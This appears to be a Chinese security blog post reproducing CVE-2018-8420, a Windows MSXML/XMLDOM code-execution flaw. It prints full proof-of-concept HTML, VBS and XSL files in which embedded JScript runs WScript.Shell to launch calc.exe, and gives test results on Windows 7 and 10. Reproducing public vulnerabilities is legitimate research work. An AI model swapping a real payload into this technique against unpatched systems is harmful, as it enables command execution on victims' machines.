CVE-2018-8420 复现

0x01 漏洞描述

最近太忙了,好好写文章肯定是不能好好写的。晚上出了一个windows的通杀rce漏洞,漏洞编号是CVE-2018-8420。简单看了下漏洞描述,应该是windows的Microsoft.XMLDOM引起的,看了下POC有点像XXE。

0x02 漏洞影响范围

  • Microsoft Windows 10 Version 1607 for 32-bit Systems
  • Microsoft Windows 10 Version 1607 for x64-based Systems
  • Microsoft Windows 10 Version 1803 for 32-bit Systems
  • Microsoft Windows 10 Version 1803 for x64-based Systems
  • Microsoft Windows 10 for 32-bit Systems
  • Microsoft Windows 10 for x64-based Systems
  • Microsoft Windows 10 version 1703 for 32-bit Systems
  • Microsoft Windows 10 version 1703 for x64-based Systems
  • Microsoft Windows 10 version 1709 for 32-bit Systems
  • Microsoft Windows 10 version 1709 for x64-based Systems
  • Microsoft Windows 7 for 32-bit Systems SP1
  • Microsoft Windows 7 for x64-based Systems SP1
  • Microsoft Windows 8.1 for 32-bit Systems
  • Microsoft Windows 8.1 for 64-bit Systems
  • Microsoft Windows RT 8.1
  • Microsoft Windows Server 1709
  • Microsoft Windows Server 1803
  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1
  • Microsoft Windows Server 2008 for 32-bit Systems SP2
  • Microsoft Windows Server 2008 for Itanium-based Systems SP2
  • Microsoft Windows Server 2008 for x64-based Systems SP2
  • Microsoft Windows Server 2012
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows Server 2016

嗯,看情况全版本通杀

0x03 漏洞复现

POC地址:https://github.com/Lz1y/CVE-2018-8420

1
2
3
4
5
6
7
8
9
10
11
//xml.html
<script type="text/vbscript">
Sub POC()
Set XML = CreateObject("Microsoft.XMLDOM")
XML.async = False
Set xsl = XML
xsl.Load "xml.xml"
XML.transformNode xsl
End Sub
POC()
</script>
1
2
3
4
5
6
7
8
9
//xml.vbs
Sub Dummy()
Set XML = CreateObject("Microsoft.XMLDOM")
XML.async = False
Set xsl = XML
xsl.Load "xml.xml"
XML.transformNode xsl
End Sub
Dummy()
1
2
3
4
5
6
7
8
9
10
11
12
//xml.xml
<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]> </ms:script>
</stylesheet>

在window7下通过ie浏览器打开xml.html,可以成功触发漏洞。

3

但是在window10下,通过ie打开没办法复现,这里怀疑是新版ie的一些修改,有知道的大佬可以给我普及一下原理吗。

2

但是通过vbs,是可以成功执行的。

2

0x04 总结

感觉这个漏洞的利用方式和范围都有待商榷,会弹窗感觉有点儿鸡肋,或许是我渗透做的少,还没理解到精髓,在我看来,可能是个弟弟漏洞。

refer

倾旋朋友圈